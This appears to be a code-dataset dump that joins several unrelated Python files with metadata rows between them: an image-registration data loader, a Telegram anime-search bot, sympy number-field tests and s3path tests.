target_seg = sitk.ReadImage(trg_seg_path, sitk.sitkFloat32)
source_msk = sitk.GetImageFromArray(np.ones(source.GetSize()[::-1]))
target_msk = sitk.GetImageFromArray(np.ones(target.GetSize()[::-1]))
if csv_file_msk:
src_msk_path = self.msk_data.iloc[idx, 0]
trg_msk_path = self.msk_data.iloc[idx, 1]
print('Reading source mask ' + src_msk_path)
source_msk = sitk.ReadImage(src_msk_path, sitk.sitkFloat32)
source_msk.CopyInformation(source)
print('Reading target mask ' + trg_msk_path)
target_msk = sitk.ReadImage(trg_msk_path, sitk.sitkFloat32)
target_msk.CopyInformation(target)
if normalizer_img:
source = normalizer_img(source, source_msk)
target = normalizer_img(target, target_msk)
if resampler_img:
source = resampler_img(source)
target = resampler_img(target)
source_msk = resampler_img(source_msk)
target_msk = resampler_img(target_msk)
if normalizer_seg:
source_seg = normalizer_seg(source_seg)
target_seg = normalizer_seg(target_seg)
if resampler_seg:
source_seg = resampler_seg(source_seg)
target_seg = resampler_seg(target_seg)
if len(source.GetSize()) == 3:
source.SetDirection((1, 0, 0, 0, 1, 0, 0, 0, 1))
target.SetDirection((1, 0, 0, 0, 1, 0, 0, 0, 1))
else:
source.SetDirection((1, 0, 0, 1))
target.SetDirection((1, 0, 0, 1))
source.SetOrigin(np.zeros(len(source.GetOrigin())))
target.SetOrigin(np.zeros(len(target.GetOrigin())))
source_seg.CopyInformation(source)
target_seg.CopyInformation(target)
source_msk.CopyInformation(source)
target_msk.CopyInformation(target)
sample = {'source': source, 'target': target, 'source_seg': source_seg, 'target_seg': target_seg, 'source_msk': source_msk, 'target_msk': target_msk}
self.samples.append(sample)
def __len__(self):
return len(self.img_data)
def __getitem__(self, item):
sample = self.samples[item]
source = torch.from_numpy(sitk.GetArrayFromImage(sample['source'])).unsqueeze(0)
target = torch.from_numpy(sitk.GetArrayFromImage(sample['target'])).unsqueeze(0)
source_seg = torch.from_numpy(sitk.GetArrayFromImage(sample['source_seg'])).unsqueeze(0)
target_seg = torch.from_numpy(sitk.GetArrayFromImage(sample['target_seg'])).unsqueeze(0)
source_msk = torch.from_numpy(sitk.GetArrayFromImage(sample['source_msk'])).unsqueeze(0)
target_msk = torch.from_numpy(sitk.GetArrayFromImage(sample['target_msk'])).unsqueeze(0)
return {'source': source, 'target': target, 'source_seg': source_seg, 'target_seg': target_seg, 'source_msk': source_msk, 'target_msk': target_msk}
def get_sample(self, item):
return self.samples[item]
| 42.806763 | 161 | 0.62476 | 1,073 | 8,861 | 4.931034 | 0.079217 | 0.034398 | 0.006804 | 0.03402 | 0.846532 | 0.795691 | 0.762049 | 0.721414 | 0.701947 | 0.701947 | 0 | 0.015432 | 0.268706 | 8,861 | 206 | 162 | 43.014563 | 0.80108 | 0.115224 | 0 | 0.573529 | 0 | 0 | 0.061339 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.058824 | false | 0 | 0.036765 | 0.029412 | 0.154412 | 0.073529 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
db60e95abebb8c8530c95b65723600e83bfa473b | 35 | py | Python | nba/structure/__init__.py | jngaravitoc/nba | d2a64a69fd743e066fe3e0bad9c9bc109763ff97 | [
"MIT"
] | null | null | null | nba/structure/__init__.py | jngaravitoc/nba | d2a64a69fd743e066fe3e0bad9c9bc109763ff97 | [
"MIT"
] | null | null | null | nba/structure/__init__.py | jngaravitoc/nba | d2a64a69fd743e066fe3e0bad9c9bc109763ff97 | [
"MIT"
] | null | null | null | from .structure import Structure
| 11.666667 | 33 | 0.8 | 4 | 35 | 7 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.171429 | 35 | 2 | 34 | 17.5 | 0.965517 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
dbb0b5062b24522bf82a85cf8e1725fc59ca3967 | 46 | py | Python | web/addons/__init__.py | diogocs1/comps | 63df07f6cf21c41e4527c06e2d0499f23f4322e7 | [
"Apache-2.0"
] | null | null | null | web/addons/__init__.py | diogocs1/comps | 63df07f6cf21c41e4527c06e2d0499f23f4322e7 | [
"Apache-2.0"
] | null | null | null | web/addons/__init__.py | diogocs1/comps | 63df07f6cf21c41e4527c06e2d0499f23f4322e7 | [
"Apache-2.0"
] | null | null | null | '''
Created on 29/10/2014
@author: diogo
'''
| 7.666667 | 21 | 0.608696 | 7 | 46 | 4 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.210526 | 0.173913 | 46 | 5 | 22 | 9.2 | 0.526316 | 0.804348 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
dbb75bb928b018730096d1a2c5506e8db69f0363 | 48 | py | Python | dgt/inference/__init__.py | fractalego/dgt | 6781b9445d93c4a1680ab3d5636803c81062cc67 | [
"MIT"
] | 3 | 2021-07-26T02:07:15.000Z | 2021-12-21T22:36:15.000Z | dgt/inference/__init__.py | fractalego/dgt | 6781b9445d93c4a1680ab3d5636803c81062cc67 | [
"MIT"
] | null | null | null | dgt/inference/__init__.py | fractalego/dgt | 6781b9445d93c4a1680ab3d5636803c81062cc67 | [
"MIT"
] | null | null | null | from .forward_inference import ForwardInference
| 24 | 47 | 0.895833 | 5 | 48 | 8.4 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.083333 | 48 | 1 | 48 | 48 | 0.954545 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
dbbe4f558307c3529174b3aea19ab2b61367f3e9 | 1,365 | py | Python | plgx-esp-ui/polylogyx/extra_sql_methods.py | eclecticiq/eiq-er-ce | ebb12d5c4e0ee144f8166576924b8ce8dc5dfc94 | [
"MIT"
] | null | null | null | plgx-esp-ui/polylogyx/extra_sql_methods.py | eclecticiq/eiq-er-ce | ebb12d5c4e0ee144f8166576924b8ce8dc5dfc94 | [
"MIT"
] | null | null | null | plgx-esp-ui/polylogyx/extra_sql_methods.py | eclecticiq/eiq-er-ce | ebb12d5c4e0ee144f8166576924b8ce8dc5dfc94 | [
"MIT"
] | 2 | 2021-11-12T10:25:02.000Z | 2022-03-30T06:33:52.000Z | def _carve(string):
return str(string).title()
def _split(string, delimitter, index):
sub_strings = string.split(delimitter)
return sub_strings[index]
def _concat(*args):
return args
def _concat_ws(*args):
return args
def _regex_split(column, pattern, index):
return column, pattern, index
def _regex_match(column, pattern, index):
return column, pattern, index
def _inet_aton(string):
return string
def _community_id_v1(source_addr, dest_addr, source_port, dest_port, protocol):
return source_addr, dest_addr, source_port, dest_port, protocol
def _to_base64(string):
return string
def _from_base64(string):
return string
def _conditional_to_base64(string):
return string
def _sqrt(string):
return string
def _log(string):
return string
def _log10(string):
return string
def _ceil(string):
return string
def _floor(string):
return string
def _power(string):
return string
def _pi(string):
return string
def _sin(string):
return string
def _cos(string):
return string
def _tan(string):
return string
def _asin(string):
return string
def _acos(string):
return string
def _cot(string):
return string
def _atan(string):
return string
def _radians(string):
return string
def _degrees(string):
return string | 12.757009 | 79 | 0.704029 | 180 | 1,365 | 5.077778 | 0.266667 | 0.275711 | 0.393873 | 0.436543 | 0.287746 | 0.258206 | 0.194748 | 0.194748 | 0.09628 | 0 | 0 | 0.008388 | 0.213919 | 1,365 | 107 | 80 | 12.757009 | 0.84343 | 0 | 0 | 0.436364 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.490909 | false | 0 | 0 | 0.472727 | 0.981818 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
dbc5b24e3cfd63bf03f311149af00b937c59b731 | 3,160 | py | Python | bot/modules/search.py | Awesome-RJ/Emilia | 80200e60aea176a7e70b4cc50b085fd84bcaf3ea | [
"MIT"
] | 8 | 2021-01-23T13:58:36.000Z | 2021-12-27T07:46:47.000Z | bot/modules/search.py | Awesome-RJ/Emilia | 80200e60aea176a7e70b4cc50b085fd84bcaf3ea | [
"MIT"
] | null | null | null | bot/modules/search.py | Awesome-RJ/Emilia | 80200e60aea176a7e70b4cc50b085fd84bcaf3ea | [
"MIT"
] | 7 | 2021-02-15T08:26:15.000Z | 2022-01-29T05:57:54.000Z | from pyrogram import filters
from pyrogram.types import InlineKeyboardButton, InlineKeyboardMarkup
from bot import EMILIA, jikan
from .mal import data_from_id
@EMILIA.on_message(filters.command(["anime"], prefixes = "/") & ~filters.edited)
async def get_anime(client, message):
query = message.text.split(maxsplit = 1)
if len(query) < 2:
await EMILIA.send_message(chat_id = message.chat.id, text = "No search query found!\nExample:\n**/anime <anime_name>**", parse_mode = "markdown")
return
try:
temp = jikan.search("anime", query[-1])
buttons = []
for i in range(5):
try:
temp_btn = [InlineKeyboardButton(temp["results"][i]["title"], f"anime {temp['results'][i]['mal_id']}")]
buttons.append(temp_btn)
except:
break
text = f"Search results for **{query[-1]}**:"
await EMILIA.send_message(chat_id = message.chat.id, text = text, reply_markup = InlineKeyboardMarkup(buttons))
except Exception as e:
await EMILIA.send_message(chat_id = message.chat.id, text = f"**Error:**\n{e}")
@EMILIA.on_message(filters.command(["manga"], prefixes = "/") & ~filters.edited)
async def get_manga(client, message):
query = message.text.split(maxsplit = 1)
if len(query) < 2:
await EMILIA.send_message(chat_id = message.chat.id, text = "No search query found!\nExample:\n**/manga <manga_name>**", parse_mode = "markdown")
return
try:
temp = jikan.search("manga", query[-1])
buttons = []
for i in range(5):
try:
temp_btn = [InlineKeyboardButton(temp["results"][i]["title"], f"manga {temp['results'][i]['mal_id']}")]
buttons.append(temp_btn)
except:
break
text = f"Search results for **{query[-1]}**:"
await EMILIA.send_message(chat_id = message.chat.id, text = text, reply_markup = InlineKeyboardMarkup(buttons))
except Exception as e:
await EMILIA.send_message(chat_id = message.chat.id, text = f"**Error:**\n{e}")
@EMILIA.on_message(filters.command(["character"], prefixes = "/") & ~filters.edited)
async def get_character(client, message):
query = message.text.split(maxsplit = 1)
if len(query) < 2:
await EMILIA.send_message(chat_id = message.chat.id, text = "No search query found!\nExample:\n**/character <character_name>**", parse_mode = "markdown")
return
try:
temp = jikan.search("character", query[-1])
buttons = []
for i in range(5):
try:
temp_btn = [InlineKeyboardButton(temp["results"][i]["name"], f"char {temp['results'][i]['mal_id']}")]
buttons.append(temp_btn)
except:
break
text = f"Search results for **{query[-1]}**:"
await EMILIA.send_message(chat_id = message.chat.id, text = text, reply_markup = InlineKeyboardMarkup(buttons))
except Exception as e:
await EMILIA.send_message(chat_id = message.chat.id, text = f"**Error:**\n{e}")
| 46.470588 | 162 | 0.601582 | 387 | 3,160 | 4.79845 | 0.175711 | 0.106624 | 0.12601 | 0.106624 | 0.865913 | 0.850296 | 0.7986 | 0.7986 | 0.7986 | 0.725902 | 0 | 0.006337 | 0.250949 | 3,160 | 67 | 163 | 47.164179 | 0.7782 | 0 | 0 | 0.688525 | 0 | 0 | 0.173295 | 0.055609 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.065574 | 0 | 0.114754 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
918a48fb2e38e63f3f84c03a6ed724fe30b5f0b7 | 193 | py | Python | backend/currency_exchanger/wallets/apps.py | norbertcyran/currency-exchanger | 8896c1ad3981662d6ca0395e4c0aba6ac93f9eac | [
"MIT"
] | null | null | null | backend/currency_exchanger/wallets/apps.py | norbertcyran/currency-exchanger | 8896c1ad3981662d6ca0395e4c0aba6ac93f9eac | [
"MIT"
] | null | null | null | backend/currency_exchanger/wallets/apps.py | norbertcyran/currency-exchanger | 8896c1ad3981662d6ca0395e4c0aba6ac93f9eac | [
"MIT"
] | null | null | null | from django.apps import AppConfig
class WalletsConfig(AppConfig):
name = "currency_exchanger.wallets"
def ready(self):
import currency_exchanger.wallets.signals # noqa F401
| 21.444444 | 62 | 0.740933 | 22 | 193 | 6.409091 | 0.772727 | 0.241135 | 0.340426 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.019108 | 0.186529 | 193 | 8 | 63 | 24.125 | 0.878981 | 0.046632 | 0 | 0 | 0 | 0 | 0.142857 | 0.142857 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.4 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
918e19a694a9cfd355b6d91338fbcea9305628c0 | 11,573 | py | Python | sympy/polys/numberfields/tests/test_subfield.py | utkarshdeorah/sympy | dcdf59bbc6b13ddbc329431adf72fcee294b6389 | [
"BSD-3-Clause"
] | 1 | 2020-09-09T20:40:17.000Z | 2020-09-09T20:40:17.000Z | sympy/polys/numberfields/tests/test_subfield.py | utkarshdeorah/sympy | dcdf59bbc6b13ddbc329431adf72fcee294b6389 | [
"BSD-3-Clause"
] | 14 | 2018-02-08T10:11:03.000Z | 2019-04-16T10:32:46.000Z | sympy/polys/numberfields/tests/test_subfield.py | utkarshdeorah/sympy | dcdf59bbc6b13ddbc329431adf72fcee294b6389 | [
"BSD-3-Clause"
] | 1 | 2020-09-09T20:41:34.000Z | 2020-09-09T20:41:34.000Z | """Tests for the subfield problem and allied problems. """
from sympy.core.numbers import (AlgebraicNumber, I, Rational)
from sympy.core.singleton import S
from sympy.functions.elementary.miscellaneous import sqrt
from sympy.polys.numberfields.subfield import (
is_isomorphism_possible,
field_isomorphism_pslq,
field_isomorphism,
primitive_element,
to_number_field,
)
from sympy.polys.polyerrors import IsomorphismFailed
from sympy.polys.polytools import Poly
from sympy.testing.pytest import raises
from sympy.abc import x
Q = Rational
def test_field_isomorphism_pslq():
a = AlgebraicNumber(I)
b = AlgebraicNumber(I*sqrt(3))
raises(NotImplementedError, lambda: field_isomorphism_pslq(a, b))
a = AlgebraicNumber(sqrt(2))
b = AlgebraicNumber(sqrt(3))
c = AlgebraicNumber(sqrt(7))
d = AlgebraicNumber(sqrt(2) + sqrt(3))
e = AlgebraicNumber(sqrt(2) + sqrt(3) + sqrt(7))
assert field_isomorphism_pslq(a, a) == [1, 0]
assert field_isomorphism_pslq(a, b) is None
assert field_isomorphism_pslq(a, c) is None
assert field_isomorphism_pslq(a, d) == [Q(1, 2), 0, -Q(9, 2), 0]
assert field_isomorphism_pslq(
a, e) == [Q(1, 80), 0, -Q(1, 2), 0, Q(59, 20), 0]
assert field_isomorphism_pslq(b, a) is None
assert field_isomorphism_pslq(b, b) == [1, 0]
assert field_isomorphism_pslq(b, c) is None
assert field_isomorphism_pslq(b, d) == [-Q(1, 2), 0, Q(11, 2), 0]
assert field_isomorphism_pslq(b, e) == [-Q(
3, 640), 0, Q(67, 320), 0, -Q(297, 160), 0, Q(313, 80), 0]
assert field_isomorphism_pslq(c, a) is None
assert field_isomorphism_pslq(c, b) is None
assert field_isomorphism_pslq(c, c) == [1, 0]
assert field_isomorphism_pslq(c, d) is None
assert field_isomorphism_pslq(c, e) == [Q(
3, 640), 0, -Q(71, 320), 0, Q(377, 160), 0, -Q(469, 80), 0]
assert field_isomorphism_pslq(d, a) is None
assert field_isomorphism_pslq(d, b) is None
assert field_isomorphism_pslq(d, c) is None
assert field_isomorphism_pslq(d, d) == [1, 0]
assert field_isomorphism_pslq(d, e) == [-Q(
3, 640), 0, Q(71, 320), 0, -Q(377, 160), 0, Q(549, 80), 0]
assert field_isomorphism_pslq(e, a) is None
assert field_isomorphism_pslq(e, b) is None
assert field_isomorphism_pslq(e, c) is None
assert field_isomorphism_pslq(e, d) is None
assert field_isomorphism_pslq(e, e) == [1, 0]
f = AlgebraicNumber(3*sqrt(2) + 8*sqrt(7) - 5)
assert field_isomorphism_pslq(
f, e) == [Q(3, 80), 0, -Q(139, 80), 0, Q(347, 20), 0, -Q(761, 20), -5]
def test_field_isomorphism():
assert field_isomorphism(3, sqrt(2)) == [3]
assert field_isomorphism( I*sqrt(3), I*sqrt(3)/2) == [ 2, 0]
assert field_isomorphism(-I*sqrt(3), I*sqrt(3)/2) == [-2, 0]
assert field_isomorphism( I*sqrt(3), -I*sqrt(3)/2) == [-2, 0]
assert field_isomorphism(-I*sqrt(3), -I*sqrt(3)/2) == [ 2, 0]
assert field_isomorphism( 2*I*sqrt(3)/7, 5*I*sqrt(3)/3) == [ Rational(6, 35), 0]
assert field_isomorphism(-2*I*sqrt(3)/7, 5*I*sqrt(3)/3) == [Rational(-6, 35), 0]
assert field_isomorphism( 2*I*sqrt(3)/7, -5*I*sqrt(3)/3) == [Rational(-6, 35), 0]
assert field_isomorphism(-2*I*sqrt(3)/7, -5*I*sqrt(3)/3) == [ Rational(6, 35), 0]
assert field_isomorphism(
2*I*sqrt(3)/7 + 27, 5*I*sqrt(3)/3) == [ Rational(6, 35), 27]
assert field_isomorphism(
-2*I*sqrt(3)/7 + 27, 5*I*sqrt(3)/3) == [Rational(-6, 35), 27]
assert field_isomorphism(
2*I*sqrt(3)/7 + 27, -5*I*sqrt(3)/3) == [Rational(-6, 35), 27]
assert field_isomorphism(
-2*I*sqrt(3)/7 + 27, -5*I*sqrt(3)/3) == [ Rational(6, 35), 27]
p = AlgebraicNumber( sqrt(2) + sqrt(3))
q = AlgebraicNumber(-sqrt(2) + sqrt(3))
r = AlgebraicNumber( sqrt(2) - sqrt(3))
s = AlgebraicNumber(-sqrt(2) - sqrt(3))
pos_coeffs = [ S.Half, S.Zero, Rational(-9, 2), S.Zero]
neg_coeffs = [Rational(-1, 2), S.Zero, Rational(9, 2), S.Zero]
a = AlgebraicNumber(sqrt(2))
assert is_isomorphism_possible(a, p) is True
assert is_isomorphism_possible(a, q) is True
assert is_isomorphism_possible(a, r) is True
assert is_isomorphism_possible(a, s) is True
assert field_isomorphism(a, p, fast=True) == pos_coeffs
assert field_isomorphism(a, q, fast=True) == neg_coeffs
assert field_isomorphism(a, r, fast=True) == pos_coeffs
assert field_isomorphism(a, s, fast=True) == neg_coeffs
assert field_isomorphism(a, p, fast=False) == pos_coeffs
assert field_isomorphism(a, q, fast=False) == neg_coeffs
assert field_isomorphism(a, r, fast=False) == pos_coeffs
assert field_isomorphism(a, s, fast=False) == neg_coeffs
a = AlgebraicNumber(-sqrt(2))
assert is_isomorphism_possible(a, p) is True
assert is_isomorphism_possible(a, q) is True
assert is_isomorphism_possible(a, r) is True
assert is_isomorphism_possible(a, s) is True
assert field_isomorphism(a, p, fast=True) == neg_coeffs
assert field_isomorphism(a, q, fast=True) == pos_coeffs
assert field_isomorphism(a, r, fast=True) == neg_coeffs
assert field_isomorphism(a, s, fast=True) == pos_coeffs
assert field_isomorphism(a, p, fast=False) == neg_coeffs
assert field_isomorphism(a, q, fast=False) == pos_coeffs
assert field_isomorphism(a, r, fast=False) == neg_coeffs
assert field_isomorphism(a, s, fast=False) == pos_coeffs
pos_coeffs = [ S.Half, S.Zero, Rational(-11, 2), S.Zero]
neg_coeffs = [Rational(-1, 2), S.Zero, Rational(11, 2), S.Zero]
a = AlgebraicNumber(sqrt(3))
assert is_isomorphism_possible(a, p) is True
assert is_isomorphism_possible(a, q) is True
assert is_isomorphism_possible(a, r) is True
assert is_isomorphism_possible(a, s) is True
assert field_isomorphism(a, p, fast=True) == neg_coeffs
assert field_isomorphism(a, q, fast=True) == neg_coeffs
assert field_isomorphism(a, r, fast=True) == pos_coeffs
assert field_isomorphism(a, s, fast=True) == pos_coeffs
assert field_isomorphism(a, p, fast=False) == neg_coeffs
assert field_isomorphism(a, q, fast=False) == neg_coeffs
assert field_isomorphism(a, r, fast=False) == pos_coeffs
assert field_isomorphism(a, s, fast=False) == pos_coeffs
a = AlgebraicNumber(-sqrt(3))
assert is_isomorphism_possible(a, p) is True
assert is_isomorphism_possible(a, q) is True
assert is_isomorphism_possible(a, r) is True
assert is_isomorphism_possible(a, s) is True
assert field_isomorphism(a, p, fast=True) == pos_coeffs
assert field_isomorphism(a, q, fast=True) == pos_coeffs
assert field_isomorphism(a, r, fast=True) == neg_coeffs
assert field_isomorphism(a, s, fast=True) == neg_coeffs
assert field_isomorphism(a, p, fast=False) == pos_coeffs
assert field_isomorphism(a, q, fast=False) == pos_coeffs
assert field_isomorphism(a, r, fast=False) == neg_coeffs
assert field_isomorphism(a, s, fast=False) == neg_coeffs
pos_coeffs = [ Rational(3, 2), S.Zero, Rational(-33, 2), -S(8)]
neg_coeffs = [Rational(-3, 2), S.Zero, Rational(33, 2), -S(8)]
a = AlgebraicNumber(3*sqrt(3) - 8)
assert is_isomorphism_possible(a, p) is True
assert is_isomorphism_possible(a, q) is True
assert is_isomorphism_possible(a, r) is True
assert is_isomorphism_possible(a, s) is True
assert field_isomorphism(a, p, fast=True) == neg_coeffs
assert field_isomorphism(a, q, fast=True) == neg_coeffs
assert field_isomorphism(a, r, fast=True) == pos_coeffs
assert field_isomorphism(a, s, fast=True) == pos_coeffs
assert field_isomorphism(a, p, fast=False) == neg_coeffs
assert field_isomorphism(a, q, fast=False) == neg_coeffs
assert field_isomorphism(a, r, fast=False) == pos_coeffs
assert field_isomorphism(a, s, fast=False) == pos_coeffs
a = AlgebraicNumber(3*sqrt(2) + 2*sqrt(3) + 1)
pos_1_coeffs = [ S.Half, S.Zero, Rational(-5, 2), S.One]
neg_5_coeffs = [Rational(-5, 2), S.Zero, Rational(49, 2), S.One]
pos_5_coeffs = [ Rational(5, 2), S.Zero, Rational(-49, 2), S.One]
neg_1_coeffs = [Rational(-1, 2), S.Zero, Rational(5, 2), S.One]
assert is_isomorphism_possible(a, p) is True
assert is_isomorphism_possible(a, q) is True
assert is_isomorphism_possible(a, r) is True
assert is_isomorphism_possible(a, s) is True
assert field_isomorphism(a, p, fast=True) == pos_1_coeffs
assert field_isomorphism(a, q, fast=True) == neg_5_coeffs
assert field_isomorphism(a, r, fast=True) == pos_5_coeffs
assert field_isomorphism(a, s, fast=True) == neg_1_coeffs
assert field_isomorphism(a, p, fast=False) == pos_1_coeffs
assert field_isomorphism(a, q, fast=False) == neg_5_coeffs
assert field_isomorphism(a, r, fast=False) == pos_5_coeffs
assert field_isomorphism(a, s, fast=False) == neg_1_coeffs
a = AlgebraicNumber(sqrt(2))
b = AlgebraicNumber(sqrt(3))
c = AlgebraicNumber(sqrt(7))
assert is_isomorphism_possible(a, b) is True
assert is_isomorphism_possible(b, a) is True
assert is_isomorphism_possible(c, p) is False
assert field_isomorphism(sqrt(2), sqrt(3), fast=True) is None
assert field_isomorphism(sqrt(3), sqrt(2), fast=True) is None
assert field_isomorphism(sqrt(2), sqrt(3), fast=False) is None
assert field_isomorphism(sqrt(3), sqrt(2), fast=False) is None
a = AlgebraicNumber(sqrt(2))
b = AlgebraicNumber(2 ** (S(1) / 3))
assert is_isomorphism_possible(a, b) is False
assert field_isomorphism(a, b) is None
def test_primitive_element():
assert primitive_element([sqrt(2)], x) == (x**2 - 2, [1])
assert primitive_element(
[sqrt(2), sqrt(3)], x) == (x**4 - 10*x**2 + 1, [1, 1])
assert primitive_element([sqrt(2)], x, polys=True) == (Poly(x**2 - 2, domain='QQ'), [1])
assert primitive_element([sqrt(
2), sqrt(3)], x, polys=True) == (Poly(x**4 - 10*x**2 + 1, domain='QQ'), [1, 1])
assert primitive_element(
[sqrt(2)], x, ex=True) == (x**2 - 2, [1], [[1, 0]])
assert primitive_element([sqrt(2), sqrt(3)], x, ex=True) == \
(x**4 - 10*x**2 + 1, [1, 1], [[Q(1, 2), 0, -Q(9, 2), 0], [-
Q(1, 2), 0, Q(11, 2), 0]])
assert primitive_element(
[sqrt(2)], x, ex=True, polys=True) == (Poly(x**2 - 2, domain='QQ'), [1], [[1, 0]])
assert primitive_element([sqrt(2), sqrt(3)], x, ex=True, polys=True) == \
(Poly(x**4 - 10*x**2 + 1, domain='QQ'), [1, 1], [[Q(1, 2), 0, -Q(9, 2),
0], [-Q(1, 2), 0, Q(11, 2), 0]])
assert primitive_element([sqrt(2)], polys=True) == (Poly(x**2 - 2), [1])
raises(ValueError, lambda: primitive_element([], x, ex=False))
raises(ValueError, lambda: primitive_element([], x, ex=True))
# Issue 14117
a, b = I*sqrt(2*sqrt(2) + 3), I*sqrt(-2*sqrt(2) + 3)
assert primitive_element([a, b, I], x) == (x**4 + 6*x**2 + 1, [1, 0, 0])
def test_to_number_field():
assert to_number_field(sqrt(2)) == AlgebraicNumber(sqrt(2))
assert to_number_field(
[sqrt(2), sqrt(3)]) == AlgebraicNumber(sqrt(2) + sqrt(3))
a = AlgebraicNumber(sqrt(2) + sqrt(3), [S.Half, S.Zero, Rational(-9, 2), S.Zero])
assert to_number_field(sqrt(2), sqrt(2) + sqrt(3)) == a
assert to_number_field(sqrt(2), AlgebraicNumber(sqrt(2) + sqrt(3))) == a
raises(IsomorphismFailed, lambda: to_number_field(sqrt(2), sqrt(3)))
def test_issue_22561():
a = to_number_field(sqrt(2), sqrt(2) + sqrt(3))
b = to_number_field(sqrt(2), sqrt(2) + sqrt(5))
assert field_isomorphism(a, b) == [1, 0]
| 39.906897 | 92 | 0.654368 | 1,865 | 11,573 | 3.903485 | 0.0563 | 0.215385 | 0.281044 | 0.157967 | 0.867308 | 0.834066 | 0.756868 | 0.649038 | 0.620742 | 0.536126 | 0 | 0.051364 | 0.189147 | 11,573 | 289 | 93 | 40.044983 | 0.724425 | 0.005617 | 0 | 0.378505 | 0 | 0 | 0.000696 | 0 | 0 | 0 | 0 | 0 | 0.630841 | 1 | 0.023364 | false | 0 | 0.037383 | 0 | 0.060748 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
37d896b1ce285001c2362b684c811ebd33ff8790 | 22,111 | py | Python | tests/test_path_operations.py | Darkheir/s3path | 238f6ff0abf1a3199c8f17d58c778d72b03f10a2 | [
"Apache-2.0"
] | null | null | null | tests/test_path_operations.py | Darkheir/s3path | 238f6ff0abf1a3199c8f17d58c778d72b03f10a2 | [
"Apache-2.0"
] | null | null | null | tests/test_path_operations.py | Darkheir/s3path | 238f6ff0abf1a3199c8f17d58c778d72b03f10a2 | [
"Apache-2.0"
] | null | null | null | import sys
from pathlib import Path
from io import UnsupportedOperation
from tempfile import NamedTemporaryFile
import boto3
from botocore.exceptions import ClientError
import pytest
from s3path import PureS3Path, S3Path, StatResult
# todo: test samefile/touch method
# todo: test security and boto config changes
# todo: test open method check R/W bytes/unicode
def test_path_support():
assert PureS3Path in S3Path.mro()
assert Path in S3Path.mro()
def test_stat(s3_mock):
path = S3Path('fake-bucket/fake-key')
with pytest.raises(ValueError):
path.stat()
path = S3Path('/fake-bucket/fake-key')
with pytest.raises(ClientError):
path.stat()
s3 = boto3.resource('s3')
s3.create_bucket(Bucket='test-bucket')
object_summary = s3.ObjectSummary('test-bucket', 'Test.test')
object_summary.put(Body=b'test data')
path = S3Path('/test-bucket/Test.test')
stat = path.stat()
assert isinstance(stat, StatResult)
assert stat == StatResult(
size=object_summary.size,
last_modified=object_summary.last_modified,
)
with NamedTemporaryFile() as local_file:
local_file.write(path.read_bytes())
local_file.flush()
local_path = Path(local_file.name)
local_stat = local_path.stat()
s3_stat = path.stat()
assert s3_stat.st_size == local_stat.st_size == s3_stat.size
assert s3_stat.last_modified.timestamp() == s3_stat.st_mtime
assert s3_stat.st_mtime < local_stat.st_mtime
with pytest.raises(UnsupportedOperation):
path.stat().st_atime
path = S3Path('/test-bucket')
